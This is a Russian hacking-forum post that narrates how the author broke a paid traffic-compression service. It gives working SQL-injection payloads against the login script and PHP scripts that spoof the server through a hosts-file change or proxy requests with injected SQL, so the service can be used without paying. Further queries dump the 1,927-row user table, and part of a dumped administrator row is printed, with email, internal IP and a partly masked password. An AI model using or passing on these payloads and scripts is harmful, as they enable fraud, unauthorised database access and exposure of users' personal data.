Форум АНТИЧАТ - Ломаем Etraffic

Взлом Etraffic...

INTRO
Все начиналось в один прекрасный день, когда я страдал от скуки. Где то прочитав про такую чудесную прогу Etraffic (что то типа компрессора трафика) www.vipm.ru, я скачал ее. Там давалось всего 3 сжатых метра на осмотр возможностей программы, за остальное необходимо было платить, немного конечно 60 рублей за 350 метров, но мне подумалось: "А с какой стати?". И я принялся изучать работу программы. Как оказалось позже серверная часть программы была писана на php горе кодерами, но не буду сильно забегать вперед.

Начнем
Вообщем фаервол орал что прога лезет на айпи 66.29.31.232, порт 80. Сначала, при открытии этого айпишника в браузере, я не допер что за "Хладокомбинат кисловодский". Но все элементарное просто. Прожка стучится по домену www.vipm.ru который имеет такой же ip.

Вооружившись сниффром я отснифал следующее:

Код:

GET /server/login_v_2_0.php?ilogin=5950585A4E4C38373639&ipsw=32576473415A6B655575&iid=32303532323637&hver=2&lver=0&ilp=2A2A2A2E2A2A2A2E2A2A2A2E2A2A2A&lid=6668465745920751364 HTTP/1.1

Host: www.vipm.ru

Accept: text/html, */*

User-Agent: Mozilla/3.0 (compatible; Indy Library)

Вот оно лольство разработчиков. Данные передаются в хексе. Ну и собственно нас интересуют тут три параметра:
ilogin-логин
ipsw-пароль
ilp-айпишнег юзверя(!)(разумеетсо свой айпишнег я переделал:) )

Собственно хотелось бы обратить ваше внимание на то что прожка передает айпишнег. То есть эта система уже не является анонимной как уверяют вас авторы на главной странице сайта.

Так вот ответом на этот отосланый пакет служило это:

Код:

HTTP/1.1 200 OK

Date: Fri, 21 Sep 2007 11:40:51 GMT

Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch7 mod_ssl/2.2.3 OpenSSL/0.9.8c

X-Powered-By: PHP/5.2.0-8+etch7

ETResult: 1001

ETError: zeUg4uXw7fvpIOvu4+jtIC0gWVBYWk5MODc2OSAo7eXyIODq6uDz7fLgKQ==

Content-Length: 0

Keep-Alive: timeout=15

Connection: Keep-Alive

Content-Type: text/html; charset=cp1251

Ой что это: zeUg4uXw7fvpIOvu4+jtIC0gWVBYWk5MODc2OSAo7eXyIODq6u Dz7fLgKQ==? Узнаем здесь base64? Раскодируем и получаем: Не верный логин - YPXZNL8769 (нет аккаунта). И как ни странно прога выдает такое же сообщение. Тут я немного отвлекся заставив прогу повыдавать всякие надписи ;).

Так, первые успехи у меня есть: клиент шифрует свои данные в хексе, сервер в base64. Но что же делать дальше?

Вообще я неплохо рулю в SQL injection и втыкнув ' в параметр ilogin я получил уже другую ошибку что то типа Нет данных об аккаунте с кодом ETResult: 1000. "Не порядок" :подумал я и воткнул туда 1' /* разумеетсо шифруя все в хекс. Я получил в ответ что типа Не верный логин - 1' /* (нет аккаунта) с кодом 1001 и улыбка поползла по моему лицу. Дальше я воткнул 1' OR 1=1 /* вернулась фраза Неверный пароль с кодом 1002.

Что же тут есть SQL injection. Вообщем мне было лень сначала подбирать столбцы. Так как не было вывода. Я попытался узнать версию Бд таким образом: 1' OR 1=IF(SUBSTRING(VERSION(),0,1)=5,1,2)/* На что мне к сожалению вернулась ошибка 1001 что нам говорил о том что версия ниже пятой. Затем я узнал что имя юзера не root.

Ну решив что надо подобрать количество столбцов я это сделал и у меня получилось их 18 штук. Параметр ilogin выглядел вот так без хекса: 1' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /*.

Затем, я узнаю есть ли SQL injection в параметре ipsw. Воткнув туда кавычку и увидев что ничего не изменилось, я воткнул туда конструкцию с бенчмарком, что по идее если в ipsw есть SQL injection вызовет большое торможение в ответе сервера ;). Но тормажение отсутствовало значит скорее всего запрос к базе один, выбор идет по логину а пароль проверяется в теле скрипта.

Вот тут я начинаю тупить :(. Протыкав весь диапазон циферок от 1 до 18 в ipsw с логином
1' OR 1=1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /* я удивлялсо, неужели я ошибся :(. Но сходив и попив кофейку до меня дошло что я дурак :). И я начал протыкивать диапазон циферок от 1 до 18 с логином 1' OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /*. И на второй циферке мне повезло. Сервер вернул ответ:

Код:

HTTP/1.1 200 OK

Date: Fri, 21 Sep 2007 11:29:30 GMT

Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch7 mod_ssl/2.2.3 OpenSSL/0.9.8c

X-Powered-By: PHP/5.2.0-8+etch7

ETResult: 0

ETServer: ODIuMTAzLjEzNS4xODI=

ETServerSymbol: dmlw

ETClient: L3NlcnZlci9jbGllbnRfdl8yXzBfdmlwLnBocA==

ETEMail: Mw==

ETAcType: 12

ETPack: 7

ETTotal: 6

ETEndDate: 01.01.1970

ETTodayN: 0

ETTodayP: 0

ETClones: 1

ETMT: 5

Content-Length: 23

Keep-Alive: timeout=15

Connection: Keep-Alive

Content-Type: text/html; charset=cp1251



ETrraffic logon session

Что говорило о том что пароль "подошел" ;). Теперь опять подумав, я наваял небольшой скриптег на php вот он:

Код:

<?php

header("ETResult: 0");

header("ETServer: d3d3LnZpcG0ucnU=");

header("ETServerSymbol: dmlw");

header("ETClient: L3NlcnZlci9jbGllbnRfdl8yXzBfdmlwLnBocA==");

header("ETEMail: Mw==");

header("ETAcType: 12");

header("ETPack: 7");

header("ETTotal: 6");

header("ETEndDate: 01.01.1970");

header("ETTodayN: 0");

header("ETTodayP: 0");

header("ETClones: 1");

header("ETMT: 3");

echo('ETrraffic logon session');

?>

И заставил прожку обратится к нему, путем небольшой модификации файлега hosts ;). Уря! Значок в трее загорелся зеленым ;), что говорит об успешной аунтификации.

Теперь расшифровав вот это ETClient: L3NlcnZlci9jbGllbnRfdl8yXzBfdmlwLnBocA== получил /server/client_v_2_0_vip.php что скорее всего являлось скриптом отвечающим за передачу данных. Опять отснифаф прожку при обращеннии ее к этому скрипту я получил:

Код:

GET /server/client_v_2_0_vip.php HTTP/1.0

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50

Host: www.vipm.ru

Accept: */*

Accept-Language: ru,en;q=0.9

Accept-Charset: windows-1251, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1

ETBasic: WVBYWk5MODc2OSEkITJXZHNBWmtlVXUhJCFhSFIwY0RvdkwzZDNkeTVuYjI5bmJHVXVZMjl0TDNObFlYSmphRDlqYkdsbGJuUTliM0JsY21FbWNteHpQWEoxSm5FOUpVUXhKVGd4SlVRd0pVSkJKVVF3SlVJd0pVUXhKVGczSlVRd0pVSXdKVVF4SlRneUpVUXhKVGhESzBsU1NWTW1jMjkxY21ObGFXUTliM0JsY21FbWFXVTlkWFJtTFRnbWIyVTlkWFJtTFRnPSEkITIwNTIyNjchJCExNzIuMTcuMjAuOTA=

ETOption: MSEkITEhJCExISQhMSEkITEw

Этот пакет был сгенерирован при обращении браузером к гуглу используя эту систему. Попробовав несколько других сайтов я понял что в заголовке ничего не изменяестя только вписывается два параметра. ETOption который в себе содержит скорее всего какие-то параметры, типа там шифровать это, шифровать ли то и тд.
А вот ETBasic при декодировании из base64 выглядит вот так:

Код:

YPXZNL8769!$!2WdsAZkeUu!$!aHR0cDovL3d3dy5nb29nbGUucnUv!$!2052267!$!***.***.***.***

То есть параметры разделяются строкой !$! и содержат в себе логин, пароль, запрашиваемая страница еще раз в base64, какой-то id, ip(скрыт). Теперь генерируя пакет с ETBasic равным:

Код:

1' OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /*!$! 2!$!aHR0cDovL3d3dy5nb29nbGUucnUv!$!2052267!$!***.***.***.***

Пулачаю в ответ страницу гугля сжатую gzip-ом. И опять счастье )). И я пошел вбивать в поля логин пароль в прожке два параметра но к сожалению все было бы очень хорошо если бы я бы это смог. Но прога ни в какую ни хотела принять стока символов в свои поля. Тогда я поступил проще наваял небольшой скриптег на php который бы переадресовывав все запросы от него к серверу, попутно заменяя пароль, логин, айпишнег на то что мне нужно. Вот его код:

Код:

<?php

set_time_limit(0);



$headers = GetAllHeaders();



$packet=$_SERVER['REQUEST_METHOD'].' '.$_SERVER['REQUEST_URI'].' '.$_SERVER['SERVER_PROTOCOL'].'

';

foreach($headers as $n_head=> $v_head){

        if($n_head==='ETBasic'){

                $v_head=base64_decode($v_head);

                $v_head=str_replace('YPXZNL8769',"1' OR 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 /*",$v_head);

                $v_head=str_replace('2WdsAZkeUu','2',$v_head);

                $v_head=str_replace('***.***','***.***',$v_head);

                $v_head=base64_encode($v_head);

        }

        $packet.=$n_head.': '.$v_head.'

';

}



$post_param='';

if($_SERVER['REQUEST_METHOD']==='POST'){

        foreach($_POST as $key_n => $key_v){

                $post_param.='&'.$key_n.'='.urlencode($key_v);

        }

        $post_param=substr($post_param,1);

        $packet.='

';

        $packet.=$post_param;

}else{

$packet.='



';

}





$dt='';

$fp=fsockopen('66.29.31.232', 80);

//$fp=fsockopen('127.0.0.1', 3333);

fwrite($fp, $packet);

while(!feof($fp)) $dt.=fread($fp, 1024);

fclose($fp);



$get_packet=substr($dt,0,strpos($dt,"



")).'

';



$dt=substr($dt,strpos($dt,"



")+strlen("



"));



$get2_packet=$get_packet;



for($i=0;$i<substr_count($get2_packet,'

');$i++){

        $param=substr($get_packet,0,strpos($get_packet,'

'));

        $get_packet=substr($get_packet,strpos($get_packet,'

')+strlen('

'));

        if(strpos($param,':')>0)

        {

                header($param);

        }

}



echo($dt);

?>

Запустил прогу и о какое счастье! Прога работает отлично. ;)

Продолжение.
Не знаю почему, но на следующий день, осмыслив все это, до меня доперла одна простая истина, что ведь из базы то вывод есть. Вспомним ответ сервера на запрос скрипта login_v_2_0.php:

Код:

HTTP/1.1 200 OK

Date: Fri, 21 Sep 2007 11:29:30 GMT

Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch7 mod_ssl/2.2.3 OpenSSL/0.9.8c

X-Powered-By: PHP/5.2.0-8+etch7

ETResult: 0

ETServer: ODIuMTAzLjEzNS4xODI=

ETServerSymbol: dmlw

ETClient: L3NlcnZlci9jbGllbnRfdl8yXzBfdmlwLnBocA==

ETEMail: Mw==

ETAcType: 12

ETPack: 7

ETTotal: 6

ETEndDate: 01.01.1970

ETTodayN: 0

ETTodayP: 0

ETClones: 1

ETMT: 5

Content-Length: 23

Keep-Alive: timeout=15

Connection: Keep-Alive

Content-Type: text/html; charset=cp1251



ETrraffic logon session

И обратим внимание на праметры ETAcType ETPack ETTotal судя по всему они и являются полями 12, 7, 6. Тут я вбил в ilogin следующее 1' OR 1=2 UNION SELECT 1,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17, 18 /* ожидал увидеть грустную надпись о том что версия SQL сервера 4.бла-бла-бла. Но! Я был очень удивлен когда увидел что версия сервера равна пяти! Тут два варианта. Либо я ступил когда проверял версию раньше, либо админ переставил sql сервер. Скорее всего первое...

Ну что же в БД всего четыре таблицы:
1' OR 1=2 UNION SELECT 1,2,3,4,5,CONCAT_WS('-',TABLE_SCHEMA,TABLE_NAME),7,8,9,10,11,12,13,14,15 ,16,17,18 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA<>'information_schema' LIMIT 0,1/*

vipmru_et-et_pays
vipmru_et-et_users
vipmru_et-log
vipmru_et-online

Тут меня заинтересовала таблица et_users в ней колумны как мы помним 18 штук:
1' OR 1=2 UNION SELECT 1,2,3,4,5,COLUMN_NAME,7,8,9,10,11,12,13,14,15,16,1 7,18 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='et_users' LIMIT 0,1/*

login
password
email
name
ip
total
packed
limited
regdate
enterdate
news
actype
enddate
ban
banday
maxon
status
crc

Хех... узнав количество зарегеных тел я ох...удивился их там 1927, что то многовато для такого говнеца ( Ну что же им же хуже ;). И вот взяв свой скрипт для дампа через лимит кому надо может найти тут http://forum.antichat.ru/showthread.php?p=407239. И сдампил всю таблицу. Вот запрос:
1' OR 1=2 UNION SELECT 1,2,3,4,5,CONCAT_WS('-',login,password,email,name,ip,total,packed,limite d,regdate,enterdate,news,actype,enddate,ban,banday ,maxon,status,crc),7,8,9,10,11,12,13,14,15,16,17,1 8 FROM et_users LIMIT 0,1/*

Собственно приглядимся:
root-yuwy**ZaHF-setisoft@mail.ru--172.20.2.181-36429213-8286309-2147483647-1149192000-1190284090-1-1-1220126400-0-0-3-1161633600-1962593312

Вот скажите вам 172.20.2.181 ничего не напоминает? Так что об анонимности здесь речи может и не идти...

Сунулся я зарегится под этим логином и паролем на их сайте но к сожалению кроме как увеличить счет какого то юзера, статистики не было, вообщем ничего хорошего. Но того что я имел на данный момент мне было достаточно )))

OUTRO
Вообще все написанное выше не воспринимать всерьез. Это бред больного ума автора, который не несет ответственности за противозаконное приминение данного материала и которому это все приснилось после того как он ударилосо головой обо что-то, и вообще его тут нет ;).